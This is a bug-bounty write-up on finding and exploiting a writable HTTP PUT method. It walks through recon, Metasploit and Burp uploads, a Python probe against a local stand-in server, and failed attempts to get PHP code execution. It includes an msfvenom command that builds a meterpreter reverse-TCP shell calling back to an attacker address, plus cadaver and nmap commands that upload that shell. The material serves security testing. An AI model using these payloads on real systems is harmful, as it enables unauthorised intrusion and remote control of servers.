HTTP PUT Method Exploit
Exploiting an enabled HTTP PUT method on a private program while doing some recon, and creating arbitrary files on the server.
Hello Hackers, hope you are well!
Today I'll talk about one of the most basic web attacks, which I recently ran into while bug hunting on a private program: exploiting an enabled HTTP PUT method.
The HTTP PUT method is normally used to upload data that is saved on the server at a user-supplied URL. If enabled, an attacker may be able to place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.
The expected responses are defined by RFC 7231 (section 4.3.4): if the target resource does not have a current representation and the PUT request successfully creates one, the origin server must inform the user agent by sending a 201 (Created) response. If the target resource does have a current representation and that representation is successfully modified in accordance with the state of the enclosed representation, the origin server must send either a 200 (OK) or a 204 (No Content) response to indicate successful completion of the request. In practice, a 201 on the first PUT and a 204 on a second PUT to the same path is a strong sign that the server is really storing what you send.
While doing recon on the private program, after gathering subdomains I always convert live.txt to IPs and run some port scanning using a simple Go script, h2i.
Since this program has a small scope I only got a few IPs, and in that situation I prefer Nmap over masscan.
After a few minutes I got a very interesting result, which looked something like this.
Without wasting any time I opened Metasploit to check whether the PUT method allowed uploading or creating files on this subdomain.
First, create a small test .txt file to try uploading to the web server.
Using the auxiliary/scanner/http/http_put module in Metasploit we can test the PUT method: it sends a PUT with the file contents to the chosen path and reports whether the server accepted it.
Visiting that path on the vulnerable domain shows that the upload worked and the file is served back.
As we all know, Burp Suite is one of the most popular intercepting proxies, with which you can easily inspect and modify any kind of GET and POST request.
Burp Suite is a graphical tool for testing web application security. It is written in Java and developed by PortSwigger. Its main components are the HTTP Proxy, Scanner, Intruder, Spider, Repeater, Decoder, Comparer, Extender and Sequencer.
By intercepting a GET request to http://redact.redact.redact.target.com, changing the method to PUT and adding a request body, we can create files with any content we like.
Sending a GET request to the newly created file, http://redact.redact.redact.target.com/strik3rpoc.php, confirms that it was created successfully.
⭐ Golden TIP: "always try to escalate". With that in mind, I tried to get Remote Code Execution by putting some malicious PHP code in this file.
I attempted to execute commands through an injected cmd parameter,
but got nothing back.
I tried many ways to get commands to run, but no luck 😥: the file always reflects its own content without executing anything. When the PHP source comes back verbatim in the response body, the server is storing and serving the file as static content rather than passing it to a PHP interpreter, so a PUT that succeeds does not by itself mean code execution; it still proves arbitrary file creation (stored XSS via an uploaded .html file, defacement, or planting content for phishing), which is what this finding ended up being.
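The following is an added example, not code from the original write-up. It reproduces the check done above by hand with Metasploit and Burp: PUT a marker file, look at the status code (201 on create, 204 on overwrite, as the RFC text above describes), GET the file back, and then tell apart a server that executes an uploaded PHP file from one that merely reflects it. Because no real target can be bundled here, it includes a constructed local stand-in server that behaves like a misconfigured host honouring PUT; the host, port, and file names are assumptions.

```python
"""Added example: probe for a writable HTTP PUT endpoint and classify the result.

Not the post's own code. The local server below is a constructed stand-in for a
misconfigured target; point probe_put()/check_execution() at a real host only
with authorisation, and DELETE your test file afterwards.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class WritableHandler(BaseHTTPRequestHandler):
    """Constructed stand-in: stores whatever is PUT and serves it as static text."""

    store = {}  # path -> bytes, shared across requests (hypothetical storage)

    def log_message(self, *args):  # keep the console quiet
        pass

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        created = self.path not in self.store
        self.store[self.path] = body
        # RFC 7231 4.3.4: 201 when a resource is created, 200/204 when replaced
        self.send_response(201 if created else 204)
        self.end_headers()

    def do_GET(self):
        body = self.store.get(self.path)
        if body is None:
            self.send_response(404)
            self.end_headers()
            return
        # Served as static content: a PHP file comes back as source, never run
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_DELETE(self):
        self.send_response(404 if self.store.pop(self.path, None) is None else 204)
        self.end_headers()


def start_server():
    """Start the stand-in on a free loopback port; returns the HTTPServer."""
    srv = HTTPServer(("127.0.0.1", 0), WritableHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def request(host, port, method, path, body=None):
    """One HTTP request; returns (status, response body)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request(method, path, body=body)  # Content-Length is set automatically
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, data


def probe_put(host, port, path, content):
    """What the http_put module does: PUT, then GET it back.

    Returns (put_status, body_from_get); body is None if the PUT was refused.
    """
    status, _ = request(host, port, "PUT", path, content)
    if status not in (200, 201, 204):
        return status, None
    _, body = request(host, port, "GET", path)
    return status, body


def check_execution(host, port, path):
    """Upload a harmless PHP marker and say whether the server ran it."""
    marker = b"<?php echo 7*6; ?>"
    _, body = probe_put(host, port, path, marker)
    if body is None:
        return "put_rejected"
    if body.strip() == b"42":
        return "executed"   # interpreter ran the file: escalate to RCE
    if body == marker:
        return "reflected"  # stored and served verbatim, as in this post
    return "unknown"


if __name__ == "__main__":
    srv = start_server()
    port = srv.server_address[1]
    print(probe_put("127.0.0.1", port, "/strik3rpoc.txt", b"test"))
    print(check_execution("127.0.0.1", port, "/strik3rpoc.php"))
    print(request("127.0.0.1", port, "DELETE", "/strik3rpoc.php"))
    srv.shutdown()
```

Against a real target, replace the stand-in with the host and port from your scan and keep the marker harmless; the "executed" branch is the only case where the cmd-parameter escalation tried above can work, and "reflected" is exactly what the write-up observed.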
I also tried uploading a malicious PHP file generated with msfvenom (LHOST and LPORT are the attacker's listener address and port):
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.179.141 LPORT=4444 -f raw > shell.php
Now run cadaver, which is already installed on every Kali Linux machine. Cadaver is a command-line WebDAV client that supports uploading and downloading files.
To connect, the command is:
cadaver http://target.com/
If all is good so far, upload the shell.php file created with msfvenom from the cadaver prompt with the put command (put shell.php).
But I do not know why it didn't work for me ¯\_(ツ)_/¯
Anyway, when you face this situation you can upload the shell via Metasploit as in the step above, or use the Nmap http-put script. The original command had mismatched quotes and dashes; the corrected form, with the target path and the local file to upload as script arguments, is:
nmap -p 80 target.com --script http-put --script-args http-put.url='/strik3r_nmap.php',http-put.file='/root/shell.php'
Thanks For Reading